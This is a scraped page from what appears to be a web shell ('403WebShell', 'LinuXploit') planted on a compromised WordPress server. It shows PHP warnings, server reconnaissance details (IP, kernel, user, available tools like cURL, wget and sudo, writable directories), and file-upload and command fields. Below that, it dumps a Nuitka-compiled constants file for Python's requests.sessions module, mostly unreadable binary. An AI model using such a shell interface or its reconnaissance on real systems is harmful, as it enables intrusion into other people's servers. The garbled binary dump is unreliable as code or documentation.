Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /nuitka/eggshell.build/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /nuitka/eggshell.build/module.requests.sessions.const
���Mapping�.���to_key_val_list�.��
�update�.��	�items�.��*�&too many values to unpack (expected 2)�.�����Determines appropriate setting for a given request, taking into account
    the explicit setting on that request, and the setting in the session. If a
    setting is a dictionary, they will be merged together using `dict_class`
    �.���get�.���response���.���
session_hooks�.���
merge_setting�.���
request_hooks�.�����Properly merges both requests and session hooks.

    This is necessary because when request_hooks == {'response': []}, the
    merge breaks Session hooks entirely.
    �.���is_redirect�.���headers�.���location�.��
�is_py3�.��
�encode�.���latin1���.���to_native_string�.���utf8�.��;�7Receives a Response. Returns a redirect URI or ``None``�.���urlparse�.���hostname�.��
�scheme�.���http�.���port�.��KPN��.��	�https�.��M�N��.���
DEFAULT_PORTS�.��J�FDecide whether Authorization header should be removed when redirecting�.��F�BReceives a Response. Returns a generator of Responses or Requests.�.���self�.���get_redirect_target�.���resp�.���req�.���url�.���fragment�.���copy�.���hist�.��
�append�.���builtins��slice���KNN��R�.���history�.���content�.���ChunkedEncodingError�.���ContentDecodingError�.���raw�.���read�.�����.���decode_content���.���
max_redirects�.���TooManyRedirects�.���Exceeded %s redirects.�.��	�close�.���
startswith�.���//���.��	�%s:%s�.����.���previous_fragment�.���_replace�.��h'��.��
�parsed�.��
�geturl�.��
�netloc�.���urljoin�.���requote_uri�.���rebuild_method�.���status_code�.��	�codes�.���temporary_redirect�.���permanent_redirect�.��7�Content-Length��Content-Type��Transfer-Encoding���.���prepared_request�.���pop�.���body�.��
�Cookie�.���extract_cookies_to_jar�.���_cookies�.���
merge_cookies�.���cookies�.���prepare_cookies�.���rebuild_proxies�.���proxies�.���rebuild_auth�.���_body_position�.���Content-Length�.���Transfer-Encoding�.���rewind_body�.���yield_requests�.���send�.��
�stream�.���timeout�.��
�verify�.���cert�.���allow_redirects�.���adapter_kwargs�.���resolve_redirects�.��*�&SessionRedirectMixin.resolve_redirects�.���
Authorization�.���should_strip_auth�.���request�.��
�	trust_env�.���get_netrc_auth�.���prepare_auth�.�����When being redirected we may want to strip authentication from the
        request to avoid leaking credentials. This method intelligently removes
        and reapplies authentication where possible to avoid credential loss.
        �.���no_proxy���.���should_bypass_proxies�.���get_environ_proxies�.��	�all���.���
setdefault�.���Proxy-Authorization�.���get_auth_from_url�.���new_proxies�.��NN��.���_basic_auth_str�.���X�This method re-evaluates the proxy configuration by considering the
        environment variables. If we are redirected to a URL covered by
        NO_PROXY, we strip the proxy configuration. Otherwise, we set missing
        proxy keys for this URL (in case they were stripped by a previous
        redirect).

        This method also replaces the Proxy-Authorization header where
        necessary.

        :rtype: dict
        �.��
�method�.��
�	see_other�.���HEAD�.���GET�.��	�found�.��	�moved�.���POST�.�����When being redirected we may want to change the method of the request
        based on certain specs or browser behavior.
        �.���default_headers�.���auth�.���
default_hooks�.��	�hooks�.��
�params�.���DEFAULT_REDIRECT_LIMIT�.���cookiejar_from_dict�.���OrderedDict�.���adapters�.��	�mount�.���https://�.���HTTPAdapter�.���http://�.��
�	cookielib�.��
�	CookieJar�.���RequestsCookieJar�.���PreparedRequest�.���prepare�.��	�upper�.��	�files�.���data�.���json�.���CaseInsensitiveDict�.���
dict_class���.���merge_hooks�.��(h�h&h�h�h�hh�h�hZh�t�.���X�Constructs a :class:`PreparedRequest <PreparedRequest>` for
        transmission and returns it. The :class:`PreparedRequest` has settings
        merged from the :class:`Request <Request>` instance and those of the
        :class:`Session`.

        :param request: :class:`Request` instance to prepare with this
            session's settings.
        :rtype: requests.PreparedRequest
        �.���Request�.��(h�h&hh�h�h�h�h�hZh�t�.���prepare_request�.���merge_environment_settings�.��XConstructs a :class:`Request <Request>`, prepares it and sends it.
        Returns :class:`Response <Response>` object.

        :param method: method for the new :class:`Request` object.
        :param url: URL for the new :class:`Request` object.
        :param params: (optional) Dictionary or bytes to be sent in the query
            string for the :class:`Request`.
        :param data: (optional) Dictionary, list of tuples, bytes, or file-like
            object to send in the body of the :class:`Request`.
        :param json: (optional) json to send in the body of the
            :class:`Request`.
        :param headers: (optional) Dictionary of HTTP Headers to send with the
            :class:`Request`.
        :param cookies: (optional) Dict or CookieJar object to send with the
            :class:`Request`.
        :param files: (optional) Dictionary of ``'filename': file-like-objects``
            for multipart encoding upload.
        :param auth: (optional) Auth tuple or callable to enable
            Basic/Digest/Custom HTTP Auth.
        :param timeout: (optional) How long to wait for the server to send
            data before giving up, as a float, or a :ref:`(connect timeout,
            read timeout) <timeouts>` tuple.
        :type timeout: float or tuple
        :param allow_redirects: (optional) Set to True by default.
        :type allow_redirects: bool
        :param proxies: (optional) Dictionary mapping protocol or protocol and
            hostname to the URL of the proxy.
        :param stream: (optional) whether to immediately download the response
            content. Defaults to ``False``.
        :param verify: (optional) Either a boolean, in which case it controls whether we verify
            the server's TLS certificate, or a string, in which case it must be a path
            to a CA bundle to use. Defaults to ``True``.
        :param cert: (optional) if String, path to ssl client cert file (.pem).
            If Tuple, ('cert', 'key') pair.
        :rtype: requests.Response
        �.�����Sends a GET request. Returns :class:`Response` object.

        :param url: URL for the new :class:`Request` object.
        :param \*\*kwargs: Optional arguments that ``request`` takes.
        :rtype: requests.Response
        �.���OPTIONS�.�����Sends a OPTIONS request. Returns :class:`Response` object.

        :param url: URL for the new :class:`Request` object.
        :param \*\*kwargs: Optional arguments that ``request`` takes.
        :rtype: requests.Response
        �.�����Sends a HEAD request. Returns :class:`Response` object.

        :param url: URL for the new :class:`Request` object.
        :param \*\*kwargs: Optional arguments that ``request`` takes.
        :rtype: requests.Response
        �.���X�Sends a POST request. Returns :class:`Response` object.

        :param url: URL for the new :class:`Request` object.
        :param data: (optional) Dictionary, list of tuples, bytes, or file-like
            object to send in the body of the :class:`Request`.
        :param json: (optional) json to send in the body of the :class:`Request`.
        :param \*\*kwargs: Optional arguments that ``request`` takes.
        :rtype: requests.Response
        �.���PUT�.��|XuSends a PUT request. Returns :class:`Response` object.

        :param url: URL for the new :class:`Request` object.
        :param data: (optional) Dictionary, list of tuples, bytes, or file-like
            object to send in the body of the :class:`Request`.
        :param \*\*kwargs: Optional arguments that ``request`` takes.
        :rtype: requests.Response
        �.��	�PATCH�.��~XwSends a PATCH request. Returns :class:`Response` object.

        :param url: URL for the new :class:`Request` object.
        :param data: (optional) Dictionary, list of tuples, bytes, or file-like
            object to send in the body of the :class:`Request`.
        :param \*\*kwargs: Optional arguments that ``request`` takes.
        :rtype: requests.Response
        �.��
�DELETE�.�����Sends a DELETE request. Returns :class:`Response` object.

        :param url: URL for the new :class:`Request` object.
        :param \*\*kwargs: Optional arguments that ``request`` takes.
        :rtype: requests.Response
        �.��'�#You can only send PreparedRequests.�.���allow_redirects����.���stream���.���get_adapter�.��h&��.���preferred_clock�.��
�	timedelta�.��
�seconds���.���elapsed�.���
dispatch_hook�.���response�.��
�insert�.�K.���r�.��}�hc�s.��	�_next�.��M�ISend a given PreparedRequest.

        :rtype: requests.Response
        �.���os�.���environ�.���REQUESTS_CA_BUNDLE���.���CURL_CA_BUNDLE���.��b�^
        Check the environment and merge it with some settings.

        :rtype: dict
        �.��	�lower�.���
InvalidSchema�.��.�*No connection adapters were found for '%s'�.����~
        Returns the appropriate connection adapter for the given URL.

        :rtype: requests.adapters.BaseAdapter
        �.��
�values�.��/�+Closes all adapters and as such the session�.��{�wRegisters a connection adapter to a prefix.

        Adapters are sorted in descending order by prefix length.
        �.��
�	__attrs__�.���Session�.��aXZ
    Returns a :class:`Session` for context-management.

    .. deprecated:: 1.0.0

        This method has been deprecated since version 1.0.0 and is only kept for
        backwards compatibility. New code should use :class:`~requests.sessions.Session`
        to create a session. This may be removed at a future date.

    :rtype: Session
    �.�����
requests.session
~~~~~~~~~~~~~~~~

This module provides a Session object to manage and persist settings across
requests (cookies, auth, proxies).
�.���__doc__�.��7�3/usr/lib/python3/dist-packages/requests/sessions.py�.���__file__�.���__spec__�.��
�origin�.���has_location�.���
__cached__�.���sys�.���time�.���datetime�.��h���.��h��.�K.��
�compat�.��(h�hh�hHhht�.��(h�hWh�hYt�.��
�models�.��	h�h�h���.��h�h���.���_internal_utils�.��h��.��	�utils�.��	hh�h��.���
exceptions�.��(h:h�h2h3t�.���
structures�.��h���.��h���.��(hIhwhqhvh|hbt�.���status_codes�.��hL��.���REDIRECT_STATI���.�h�.��h+�object�����.��
�	metaclass�.���__prepare__�.���SessionRedirectMixin�.���__getitem__�.��2�.%s.__prepare__() must return a mapping, not %s�.���__name__�.���<metaclass>�.���requests.sessions�.���
__module__�.���__qualname__�.��,�(SessionRedirectMixin.get_redirect_target�.��*�&SessionRedirectMixin.should_strip_auth�.��
(�N�NN�t�.��%�!SessionRedirectMixin.rebuild_auth�.��(�$SessionRedirectMixin.rebuild_proxies�.��'�#SessionRedirectMixin.rebuild_method�.���__orig_bases__�.���X�A Requests session.

    Provides cookie persistence, connection-pooling, and configuration.

    Basic Usage::

      >>> import requests
      >>> s = requests.Session()
      >>> s.get('https://httpbin.org/get')
      <Response [200]>

    Or as a context manager::

      >>> with requests.Session() as s:
      >>>     s.get('https://httpbin.org/get')
      <Response [200]>
    �.���]�(�headers��cookies��auth��proxies��hooks��params��verify��cert��prefetch��adapters��stream��	trust_env��
max_redirects�e.���__init__�.���Session.__init__�.��
�	__enter__�.���Session.__enter__�.���__exit__�.���Session.__exit__�.���Session.prepare_request�.��(NNNNNNN�NNNNNNt�.���Session.request�.���Session.get�.���options�.���Session.options�.���head�.���Session.head�.���post�.���Session.post�.��N��.���put�.���Session.put�.��	�patch�.���
Session.patch�.��
�delete�.���Session.delete�.���Session.send�.��&�"Session.merge_environment_settings�.���Session.get_adapter�.���
Session.close�.���
Session.mount�.���__getstate__�.���Session.__getstate__�.���__setstate__�.���Session.__setstate__�.���session�.���<dictcontraction>�.���attr�h"��.���
<listcomp>�.���k��prefix���.��jB�v���.��h$��.���<module requests.sessions>�.���	__class__���.��h"��.��h"�args���.��
h"�state���.��(h"jNj?�value�t�.��
h"jE��.��h"h&�kwargs���.��(h"h&jC�adapter�t�.��h"h$�location���.��3(h"h&h]hehghh�no_proxy��env_proxies�jBjEt�.��	hh	h���.��M(�request_setting��session_setting�h��merged_setting��	none_keys��key�t�.��$(h"jCjU�keys_to_move�jat�.��(h"h&h�jSt�.��(h"h&h�h�jSt�.��!(h"hohZ�merged_cookies�h��p�t�.��"(h"hS�response�hh&�new_auth�t�.��(h"hSjjh�t�.��V(h"hSh]hh&hh}jY�bypass_proxy��environ_proxies��proxy��username��password�t�.��J(h"h�h&h�h�hhZh�h�hfhih]h�hehghhh�h%�prep��settings��send_kwargs�h$t�.��Y(h"h$h%hehfhghhh]hchjh)h&hBhS�parsed_rurl�hE�purged_headers��header�h�
rewindable�t�.��.(h"hojShiheh�jU�start�h�h�h$�gen�h0t�.��c(h"�old_url��new_url��
old_parsed��
new_parsed��changed_port��changed_scheme��default_port�t�.

Youez - 2016 - github.com/yon3zu
LinuXploit